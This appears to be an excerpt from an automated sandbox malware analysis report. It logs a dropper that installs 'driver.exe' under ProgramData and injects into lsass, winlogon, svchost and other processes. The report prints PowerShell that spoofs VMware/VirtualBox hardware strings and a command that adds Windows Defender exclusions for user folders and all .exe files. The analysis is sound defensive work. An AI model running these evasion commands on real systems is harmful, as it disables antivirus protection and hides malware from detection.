          Source: Microsoft-Windows-Partition%4Diagnostic.evtx.52.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: storahciNECVMWarVMware SATA CD00
          Source: svchost.exe, 00000034.00000000.2183063878.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
          Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.52.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: LSI_SASVMware Virtual disk 6000c292b65879ff477a6af604113f58
          Source: lsass.exe, 0000001B.00000000.2121920051.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3371581658.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3369748191.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.2125470026.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2152084537.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.3369193733.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2153856421.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3365054006.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2164109329.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3372629205.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2178476361.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: dwm.exe, 0000001F.00000002.3403437969.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: System.evtx.52.drBinary or memory string: VMCI: Using capabilities (0x1c).
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
          Source: svchost.exe, 00000034.00000000.2178331436.00000205FABB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f58
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
          Source: svchost.exe, 00000034.00000000.2183063878.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f588
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: nonicNECVMWarVMware SATA CD00
          Source: svchost.exe, 00000034.00000000.2183063878.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
          Source: svchost.exe, 00000034.00000003.2239849466.00000205FB933000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
          Source: svchost.exe, 00000034.00000002.3401813667.00000205FBFA5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 7-4vmci
          Source: svchost.exe, 0000001E.00000000.2125611374.00000195DD66A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 00000030.00000002.3364015684.000001CA97800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: VMware
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: nonicVMware Virtual disk 6000c292b65879ff477a6af604113f58
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D129000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW j
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001E858987D90
          Source: C:\Windows\System32\dialer.exeCode function: 45_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,45_2_00000001408460F0
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,14_2_00000001400017EC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF749F41160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF749F41160
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001E858987D90
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E85898D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001E85898D2A4
          Source: C:\ProgramData\IGaming\driver.exeCode function: 26_2_00007FF7F4F21160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,26_2_00007FF7F4F21160
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE867D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000140AE867D90
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE86D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000140AE86D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000195DD5CD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000195DD5C7D90
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA1D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001160CA1D2A4
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA17D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001160CA17D90
          Source: C:\Windows\System32\dialer.exeCode function: 44_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,44_2_0000000140001160
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_00000257E10AD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_00000257E10A7D90
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C937D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001F28C937D90
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C93D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001F28C93D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA9854D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_000001CA9854D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA98547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_000001CA98547D90
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D265317D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001D265317D90
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D26531D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001D26531D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27DD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_00000254A27DD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27D7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_00000254A27D7D90
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_0000024B87DDD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_0000024B87DD7D90
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD40D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00000205FD40D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD407D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00000205FD407D90
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_000001A2056AD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_000001A2056A7D90
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_0000018EC1F67D90
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_0000018EC1F6D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E0D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_0000025CE3E0D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E07D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_0000025CE3E07D90
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623898D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_000002623898D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_0000026238987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_0000026238987D90
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E597D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_000002786E597D90
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E59D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_000002786E59D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFAD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_000001611FFAD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFA7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_000001611FFA7D90
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F38D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_0000027C0F38D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F387D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_0000027C0F387D90

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DD590000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160C9B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E8589B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140AE890000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DE1A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160C9E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 257E1070000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F28C1D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CA97FD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2652E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 254A27A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24B87DA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 205FB3C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A205670000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18EC1F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25CE3BC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26238950000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2786E560000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1611FF70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C0F350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B279570000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E70A460000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22D13110000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22C8C580000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2825F1D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20BAEC90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C782530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: A60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24066EB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 181CEDB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A142790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195B6F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1428DCA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DBF9DB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D76CCC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A239D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17CFA390000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FB7270000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DF53B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 164E88A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25177B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28D5D340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 24EB5E10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F153C20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D241D40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 16FADAD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 20E03070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15204DB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 11C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 175C5280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22EF1B30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 261DE4D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 226D8930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13E5E930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 27234C50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28543540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 2B684340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CE69900000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 29283380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 193FA700000 protect: page execute and read and write
